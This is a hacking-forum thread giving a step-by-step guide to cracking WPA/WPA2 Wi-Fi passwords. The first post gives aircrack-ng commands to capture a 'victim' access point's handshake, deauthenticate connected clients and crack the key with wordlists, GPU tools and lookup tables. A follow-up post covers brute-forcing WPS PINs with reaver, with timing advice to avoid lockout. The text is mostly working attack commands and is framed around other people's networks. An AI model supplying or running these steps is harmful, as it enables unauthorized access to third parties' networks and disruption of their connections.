How to crack WPA/WPA2 secured wireless networks

Learn how to test your wireless network security. Is your mobile phone safe to talk on? Is DSL internet really 100% safe or can it be hacked?!
Post Reply
User avatar
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT >
Game Hacking YT >
Game Hacks Store >
Location: unknown

How to crack WPA/WPA2 secured wireless networks

Post by Sethioz »

Update (15-aug-2013)
This post is very old and i have done this many times by now.
Most important note i have to bring out, is that getting the handshake is not easy, it only works if you have very good signal, its common that you don't get the handshake if you deauth the client.
Also i have used Elcomsoft Distributed Password Recovery to launch bruteforce against WPA2 handshake using 10 computers, was able to crack 8 digit lower alpha in week.

How to patch zydas 1211 / zd1211 chipset in order to get injection working < I don't think this is necessary anymore, as BackTrack5 R3 supports most of the adapters now.

UPDATE - this is very important security update. it is now possible to intercept WPA TKIP traffic. this means that you can crack the traffic and see whats going on, it is not possible to get the key yet, but you can see traffic, i have not yet tested it, because of lack of networks. i have only one WPA/TKIP in range and nobody home there.
it is possible to use "tkiptun-ng" tool, which has been added into the latest aircrack-ng suite.
read more there (if link is broken, post reply and report) >

first, you can't really do that in windows at all, maybe on some specific wireless adapters you can. you need to set your wireless adapter to rfmon mode (monitor mode), this becomes problem in windows, because there's no drivers for that. so your best choice is linux.
I suggest you to download BackTrack 4 live cd and run that instead, so you don't have to install anything.
in backtrack4 you have all the tools needed. if you do that on linux, get aircrack-ng suite (use synaptic manager or google)
note that for WPA cracking you need somebody to be connected to the access point ! otherwise don't even bother.

1. open terminal and lets get started

Code: Select all

airmon-ng start wlan0
wlan0 < this is your wireless adapter's interface (maybe different from mine)
now it says that monitor mode has been enabled on mon0 (also maybe different)

2. now lets run airodump to scope for a victim

Code: Select all

airodump-ng mon0
choose your victim from there and stop it by pressing "CTRL+C" when terminal is focused (active)

3. now we need to monitor and save the packets from your victim:

Code: Select all

airodump-ng -c 1 --bssid 00:00:00:00:00:00 -w packets mon0
-c < this is channel, if "-c" does not work, then use "--channel"
--bssid < mac address of your victim's wireless access point
-w < command to save packets (where "packets" is the name of your savefile you want to create)
mon0 < your monitor interface

now we need handshake between client and access point, there's 2 ways to get it. you can either wait until somebody logs in or you can deauthenticate the logged in client (user). if you decide to wait, then skip to step 5, if you want it faster and slightly harder way, then follow next step.

4. here we are going to deauthenticate the logged in client

Code: Select all

aireplay-ng -0 1 -a 00:00:00:00:00:00 -c 11:11:11:11:11:11 mon0
-0 < deauthentication feature (where 1 is the number of deauths to send)
-a < mac address of your victim (access point)
-c < mac address of the connected client you want to deauthenticate
mon0 < your monitor interface

now in your airodump window, it shows "WPA handshake: 00:00:00:00:00:00"

5. now the longest part, the cracking. now here's many different tools and methods you can use, you can also do this process on windows, you can now close your capture (airodump).

- aircrack-ng (you already have it if you this far)
you can run this directly from your terminal.

Code: Select all

aircrack-ng -w wordlist -b 00:00:00:00:00:00 packets.cap
-w < specifiy your wordlist you want to use (yes you need wordlist to attack the key)
-b < mac address of your victim (access point, because there maybe more handshakes in the captured packets file)
packets.cap < the file you created in step 2 (.cap is the capture file extension)

- EWSA (elcomsoft wireless security auditor) now this tool is quite good, it can run brute-force and wordlist attacks and it uses CPU + GPU (graphics processing unit < your video/graphics card) to crack, as result the crack speed is about 30 times faster. however it is hard to find a working crack and there is no way i buy this program.

- Cain - this used to be my favorite tool for MD5 hash cracking, however it is quite slow against WPA. you can extract the handshake directly from a .cap file using Cain, it supports brute-force and wordlist attacks, however the attack speed is like 200p/s (pass per second) using my 2.8ghz dual core cpu. cain does not support GPU cracking.

-cowpatty - i have never used it myself, but it supports the so called "WPA rainbow tables" (lookup tables). this kind of attack is far more faster, they say it can go thru 150000 passwords per sec, but you need the "lookup tables" for that. cowpatty also supports other type of attacks, but the are slow ofcourse.

i just tested cowpatty with the WPA lookup tables, this is amazing how fast this is, here's the results:

Code: Select all

996359 passphrases tested in 9.91 seconds:  100581.36 passphrases/second
SSID (access point name) is CaSe SeNsItIVE. what it means, is that i used one lookup table containing passphases for "WLAN-AP".
In first test the AP was called "WLAN-AP" and it was cracked successfully
in second test the AP was named "wlan-ap" and password (key) was not found using the same lookup table.

Some useful info:

WPA lookup tables
About WPA rainbow tables < torrent links does not work there, so don't bother.
How to crack password hashes < my own guide, useful stuff on how to make a wordlist and more.
I will make video tutorial once i get chance, i have no WPA protected networks in range, which i could crack. maybe i could get few, but i can't be bothered to move my dish antenna. Also next problem would be connected clients, i did a scan once and couldn't see any connected clients.

How to generate a lookup table:
you can use genpmk (included in cowpatty) to generate a lookup table using fixed SSID (AP name), but its quite slow about 1000p/s generation speed.

Pyrit - never used, but this tool seem to be using GPU power again, but this tool uses it to generate the lookup tables instead. this can be a lot faster than using genpmk to generate the tables.

Special thanks to Suicidal Looney for the SSID testing.

i edited this part, because i managed to sort this error out, so i removed this completely (useless)
now how to use genpmk, there is very important thing for you to know !
when you make your wordlist in windows, then it will not work !
why ?
windows uses "0D 0A" as newline, but you only need "0A" as new line.
huh ?
yes, use hex editor to see what im talking about, i suggest you to use XVI32. if you want to convert any wordlist, then simple open it in XVI32, then use "replace" feature, there choose replace hex and replace "0D 0A" with "0A", save the file and you are done. also DO NOT save it as .txt, because it may screw it up again. use 'save as...' and save it as 'file' (without extension).
this method worked just fine for me.

i have included the .cap files with 2 different SSIDs. both use "verwarnter" as key/password.
This is for ppl who want to test out the cracking process only.
You can also use those .cap files to test your generated pmk lookup tables.

I have tested the genpmk tool lil bit, it can append to the current lookup tables. so if somebody is interested and has some wordlists on his own, like in some other language maybe and wants to append to the current ones, then lets make a project out of it.
it would really help if somebody has access to a cluster.

There is also one idea circleing in my head, maybe its crazy, maybe not. ive been thinking if its possible to merge 2 of those lookup tables with only a hex editor or raptor or any other tool that can just merge files. i will certainly test and update. if thats possible, then every person who is interested in this, can make his own small lookup tables and attach them to the posts here, then i can merge all of them, creating a massive lookup table with lots and lots of words in it. if even 10 ppl could help me out by generating those, it would be very good already.
Plz reply if you are even slightly interested in this project, i can give the exact details how to use genpmk (its quite written here already anyways). well what you need to know is how to make it with the right SSID and the "0D 0A" problem described above.
sucessfully cracking WPA/WPA2 network in uncontrolled environment can be quite hard, specially if user has strong key, but not if all the ppl would team up who are interested in that.
right now im generating lookup table for "wlan-ap" using 8-16 character words in the list. this wordlist is available in my downloads > others section and its called 4-16, there is no point to use that, so i took out all words shorter than 8 (WPA/WPA2 allows 8 - 63 chars only).
once the lookup table is done, i will post the generation time here, so far its been running for about 4-5 hours and have done nearly 1 million, theres around 4 million words in that list.

my results:
cpu 2.8ghz dual core > 300p/s
nVidia 9500GT 512mb 650 or 750mhz core clock > 7500p/s
those results can change. like with cpu it can be from 200 - 400 and with gpu it can be from 6000 - 8500. all depends on temp, resource usage..etc.

it took me about 14h to generate lookup table from about 3.4 million words. size of table is 139mb

lookup tables mergeing works fine. you can generate 2 seperate lookup table and then merge them with HEX editor (i used XVI32).
cap files.rar
wlan-ap_lower.cap - wlan-ap as SSID
both use verwarnter as password
(10.78 KiB) Downloaded 1626 times
User avatar
Posts: 4762
Joined: Fri Jul 27, 2007 5:11 pm
Custom: Gaming YT >
Game Hacking YT >
Game Hacks Store >
Location: unknown

Re: How to crack WPA/WPA2 secured wireless networks

Post by Sethioz »

I have found a new way to crack WPA/WPA2 networks. Not all AP's are vulnerable, but the ones that are, success rate is 100%, however it takes a lot longer than WEP cracking. There is that new technology called WPS (Wi-Fi Protected Setup / System). It has a vulnerability in it. It's possible to crack the pin which is a lot easier to crack than WPA/WPA2 pass itself.
It takes about 1-4 days, depending on router and signal strenght.

There is a tool called "reaver" that can attack WPS system. I won't post any links, because those numbnutted brainmonkeys always change shit and i don't want any dead links on my forum, so just google (or use the included version, it might be out to date tho).

I have tested few times and i strongly recommend using delay (-d option) with at least 10 second delay. so add

Code: Select all

-d 10
default is 1, but it is too fast, i locked one station's WPS like that. i don't know if it's permanent tho, it might unlock itself after some time tho, but nowday routers crash a lot so most likely sooner or later it will get unlocked, but i still recommend not taking a risk. i went down to 8 tho and it seem to be working fine, but i don't want to increase it either. It's bit slow tho. 3-4 hours and only 3.5% done.
good thing is that it saves the session and you can continue it.

NOTE - as of BackTrack5R3 reaver is already pre-installed, so optain copy of BT5R3 and you're good to go.

How to install reaver on backtrack5 (BT5)

Code: Select all

./configure --prefix=/usr
make install
How to find out if station is vulnerable?
- reaver includes a tool called walsh / wash. depending on the version of reaver, the one included here uses wash.

simply use the following command:

Code: Select all

wash -i mon0 -C
-C is not needed, but in case you get bad FCS error you should use -C
im quite new to this and i don't know if using -C has any down sides, but i don't see it do any harm, so use with -C

I have successfully cracked 2 APs protected with WPA2-PSK key which is 8 Digit UPPER alpha + numbers. If you would capture handshake and try and bruteforce it, then on single machine it would take about 5-10 years, depending on the machine. I have 3.6ghz quad core with 2GB GTX550 and it would take me 7 years, while using this WPS method it took me 3 days to crack 2 keys.
(709.99 KiB) Downloaded 1703 times
BT5 testbox [Running] - Oracle VM VirtualBox_2012-05-14_01-26-18.jpg
Post Reply